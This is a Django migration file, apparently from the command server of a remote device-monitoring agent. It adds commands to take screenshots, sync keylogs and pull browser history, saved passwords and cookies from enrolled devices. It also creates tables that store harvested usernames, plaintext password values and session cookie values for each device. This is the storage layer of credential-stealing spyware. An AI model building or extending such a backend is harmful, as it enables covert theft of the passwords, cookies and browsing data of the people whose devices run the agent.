# Generated by Django 4.2.28 on 2026-02-08 10:10

from django.db import migrations, models
import django.db.models.deletion
import uuid


class Migration(migrations.Migration):

    dependencies = [
        ('api', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='deviceconfig',
            name='browser_data_enabled',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='deviceconfig',
            name='browser_history_sync_interval',
            field=models.IntegerField(default=14400),
        ),
        migrations.AlterField(
            model_name='command',
            name='command_type',
            field=models.CharField(choices=[('screenshot', 'Take Screenshot'), ('config_refresh', 'Refresh Configuration'), ('keylog_sync', 'Sync Keylogs Now'), ('browser_sync', 'Sync Browser Data'), ('browser_history_sync', 'Sync History Only'), ('browser_credential_sync', 'Sync Passwords Only'), ('browser_cookie_sync', 'Sync Cookies Only'), ('update_agent', 'Update Agent'), ('restart_agent', 'Restart Agent'), ('custom', 'Custom Command')], max_length=30),
        ),
        migrations.CreateModel(
            name='BrowserHistory',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('url', models.URLField(max_length=2048)),
                ('title', models.CharField(blank=True, max_length=500)),
                ('visit_count', models.IntegerField(default=1)),
                ('last_visit_time', models.DateTimeField()),
                ('browser_type', models.CharField(blank=True, max_length=50)),
                ('received_at', models.DateTimeField(auto_now_add=True)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='browser_history', to='api.device')),
            ],
            options={
                'verbose_name_plural': 'Browser History',
                'ordering': ['-last_visit_time'],
            },
        ),
        migrations.CreateModel(
            name='BrowserCredential',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('origin_url', models.URLField(max_length=2048)),
                ('action_url', models.URLField(blank=True, max_length=2048, null=True)),
                ('username_element', models.CharField(blank=True, max_length=255)),
                ('username_value', models.CharField(max_length=255)),
                ('password_element', models.CharField(blank=True, max_length=255)),
                ('password_value', models.CharField(max_length=255)),
                ('browser_type', models.CharField(blank=True, max_length=50)),
                ('created_at_browser', models.DateTimeField(blank=True, null=True)),
                ('received_at', models.DateTimeField(auto_now_add=True)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='browser_credentials', to='api.device')),
            ],
            options={
                'ordering': ['-received_at'],
            },
        ),
        migrations.CreateModel(
            name='BrowserCookie',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('host_key', models.CharField(max_length=255)),
                ('name', models.CharField(max_length=255)),
                ('value', models.TextField()),
                ('path', models.CharField(max_length=255)),
                ('expires_utc', models.DateTimeField(blank=True, null=True)),
                ('is_secure', models.BooleanField(default=False)),
                ('is_httponly', models.BooleanField(default=False)),
                ('browser_type', models.CharField(blank=True, max_length=50)),
                ('received_at', models.DateTimeField(auto_now_add=True)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='browser_cookies', to='api.device')),
            ],
        ),
    ]
